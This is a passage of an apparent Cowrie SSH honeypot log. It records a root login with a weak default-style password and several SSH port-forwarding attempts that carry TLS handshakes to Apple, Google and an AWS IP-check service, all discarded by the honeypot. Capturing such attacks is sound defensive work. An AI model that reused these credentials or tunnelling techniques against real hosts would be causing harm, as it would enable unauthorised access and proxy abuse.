"message":"discarded direct-tcp forward request 1 to 184.30.249.36:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x9e\\xe5\\xc7\\\\ZX[\\xddMS\\xf3[\\xe4\\x8f\\x1a\\xa9r\\x02\\x84\\x84M\\xe0k\\xbf@7\\x86\\x1do\\xfd\\x02\\x1e u\\x88\\xc7\\xd1\\x11g*c\\xf9\\xcf\\xd3\\xae\\xfb\\x920wI\\x99\\xe9\\x0bP)\\x7f\\xf7\\x9d.\\x7f&3J\\xbb\\x13\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xeb\\xf4\\xd9<\\x8d\\x97JkU\\xf0\\x0bj\\xf5|Q\\xc0_\\x8c\\xa4\\xc5\\x94\\xfd\\xb4\\xfe\\x08\\xfa\\x1eq\\x8a\\xdf\\x86c\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T21:59:43.626502Z","src_ip":"185.156.73.233","session":"5c00897fe554"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.36.36","dst_port":443,"src_ip":"185.156.73.233","src_port":47842,"message":"direct-tcp connection request to 142.251.36.36:443 from 127.0.0.1:47842","sensor":"my-vps","timestamp":"2025-08-28T21:59:43.660349Z","session":"5c00897fe554"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.36.36","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x88\\x8b\\xcbI\\x84\\xd3\\x8dx9\\xa3\\xb1\\xf2\\xbd\\x9d\\x18\\xc6Y.>v\\xa5js\\x18R\\xf3\\xec\\xa3\\xf0D\\xf4\\xc5 \\xe6L\\x1a\\n\\x92\\x01\\x8f/Z+\\xbd\\xe2\\xea\\xafdb\\xbf\\xe7\\xc1\\xb9k\\x07\\xe2\\xbb\\xa6\\xc5@\\x16*\\x81\\x0c\\xc1\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x96\\x0b\\x8df 6\\xb8J\\xee-n\\x166\\xbe`[f\\xd7CM\\x9dO\\xb1\\x91\\xda\\xc7\\xd6K\\xc9\\xda\\xd9F\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.36.36:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x88\\x8b\\xcbI\\x84\\xd3\\x8dx9\\xa3\\xb1\\xf2\\xbd\\x9d\\x18\\xc6Y.>v\\xa5js\\x18R\\xf3\\xec\\xa3\\xf0D\\xf4\\xc5 \\xe6L\\x1a\\n\\x92\\x01\\x8f/Z+\\xbd\\xe2\\xea\\xafdb\\xbf\\xe7\\xc1\\xb9k\\x07\\xe2\\xbb\\xa6\\xc5@\\x16*\\x81\\x0c\\xc1\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x96\\x0b\\x8df 6\\xb8J\\xee-n\\x166\\xbe`[f\\xd7CM\\x9dO\\xb1\\x91\\xda\\xc7\\xd6K\\xc9\\xda\\xd9F\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T21:59:43.709355Z","src_ip":"185.156.73.233","session":"5c00897fe554"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:59:43.770740Z","src_ip":"185.156.73.233","session":"5c00897fe554"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55554,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bc82d3b7c27","protocol":"ssh","message":"New connection: 212.227.235.229:55554 (1.2.3.4:22) [session: 5bc82d3b7c27]","sensor":"my-vps","timestamp":"2025-08-28T21:59:59.209836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-28T21:59:59.210641Z","src_ip":"212.227.235.229","session":"5bc82d3b7c27"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-28T21:59:59.308494Z","src_ip":"212.227.235.229","session":"5bc82d3b7c27"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:59:59.799416Z","src_ip":"212.227.235.229","session":"5bc82d3b7c27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.195.91.125","dst_port":443,"src_ip":"212.227.235.229","src_port":57892,"message":"direct-tcp connection request to 54.195.91.125:443 from 127.0.0.1:57892","sensor":"my-vps","timestamp":"2025-08-28T22:00:00.611020Z","session":"5bc82d3b7c27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.195.91.125","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xb8\\xed\\x972\\x98S\\xc6|\\x97\\xb0\\xd1\\x9b\\xf5[3)\\x87\\xfb\\xa4\\xe54\\xb0E\\xb3>oW\\xff4u\\xba\\xf7 \\x9eU\\xc0\\x13aM\\xb5\\x8c\\x08\\xb8\\t}n\\xc8\\xf6r8*c\\xf0xfF\\x81\\x84K\\x10{\\x98\\xb3?\\x04\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 Qy\\x17\\xd6\\x03y\\x16\\xe0\\xaa>^\\xb9\\xac\\x1c\\xaf\\x87/U}'/W\\x88\\x11\\xf9\\xf0?\\xddf\\xb8\\xce\\x06\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.195.91.125:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xb8\\xed\\x972\\x98S\\xc6|\\x97\\xb0\\xd1\\x9b\\xf5[3)\\x87\\xfb\\xa4\\xe54\\xb0E\\xb3>oW\\xff4u\\xba\\xf7 \\x9eU\\xc0\\x13aM\\xb5\\x8c\\x08\\xb8\\t}n\\xc8\\xf6r8*c\\xf0xfF\\x81\\x84K\\x10{\\x98\\xb3?\\x04\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 Qy\\x17\\xd6\\x03y\\x16\\xe0\\xaa>^\\xb9\\xac\\x1c\\xaf\\x87/U}'/W\\x88\\x11\\xf9\\xf0?\\xddf\\xb8\\xce\\x06\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-28T22:00:00.843672Z","src_ip":"212.227.235.229","session":"5bc82d3b7c27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.222.9.53","dst_port":443,"src_ip":"212.227.235.229","src_port":58220,"message":"direct-tcp connection request to 23.222.9.53:443 from 127.0.0.1:58220","sensor":"my-vps","timestamp":"2025-08-28T22:00:00.957795Z","session":"5bc82d3b7c27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.222.9.53","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03w\\xe2\\xed[(v\\x12\\xe8\\xc1\\xe1\\xb6*\\x8e\\xc6\\xfdx[.\\xa1\\x05\\xabg}\\xc8\\x9f\\x95\\xe9\\xa2\\xa5v\\x99\\xee $\\xf5:&\\xb9\\xd3\\x19+\\xf6x\\xd5\\xa8P\\xa3.\\x00)%r\\xefV\\xa5B\\xb0\\x16\\xec\\x92CY;\\xfcS\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9f&\\x04\\xcb\\x12P\\xc2\\x92\\xe4\\x13\\xbd&\\x01`\\x87\\xa0\\xcf\\x96ij%s\\xd0\\xb1\\xb0\\x0f\\xcb.0\\x92A\\x06\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.222.9.53:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03w\\xe2\\xed[(v\\x12\\xe8\\xc1\\xe1\\xb6*\\x8e\\xc6\\xfdx[.\\xa1\\x05\\xabg}\\xc8\\x9f\\x95\\xe9\\xa2\\xa5v\\x99\\xee $\\xf5:&\\xb9\\xd3\\x19+\\xf6x\\xd5\\xa8P\\xa3.\\x00)%r\\xefV\\xa5B\\xb0\\x16\\xec\\x92CY;\\xfcS\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x